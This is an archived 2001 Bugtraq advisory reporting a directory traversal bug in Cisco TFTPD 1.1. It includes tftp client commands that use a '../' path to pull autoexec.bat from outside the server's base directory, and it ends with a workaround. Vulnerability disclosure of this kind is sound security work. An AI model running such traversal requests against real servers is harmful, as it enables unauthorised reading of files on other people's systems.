[21074] in bugtraq
Cisco TFTPD 1.1 Vulerablity
daemon@ATHENA.MIT.EDU (Siberian)
Mon Jun 18 18:58:56 2001
Message-ID: <004601c0f7fa$acde2c20$0100007f@smax>
From: "Siberian" <siberian@splashpages.de>
To: <bugtraq@securityfocus.com>
Date: Mon, 18 Jun 2001 15:29:14 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
[Sentry Research Labs - ID0201061701]
(c) 2001 by www.sentry-labs.com
Note:
This advisory is for information and educational purpouse only! We
are not responsible for any abuse or damage resulting from these
information.
Author:
Siberian
Topic:
Security Bug in CISCO TFTPD server 1.1
Vendor Status:
Informed (06/17/01)
Vendor URL:
http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp
Preamble:
This software is some days old and I do not know if it is still supported,
but it is a serious issue which should be reported. The bug itself is very
common.
Issue:
TFTPD is vulnerable to some kind of primitve directory transversal
attack which allows a remote user to obtain any file from the target
system.
Exploit (using tftp client (Linux)):
tftp> connect target
tftp> get ../autoexec.bat
Recieved 218 bytes in 0.4 seconds
tftpd> quit
Workaround:
Install your base directory at another partition or Hardrive (not c:)
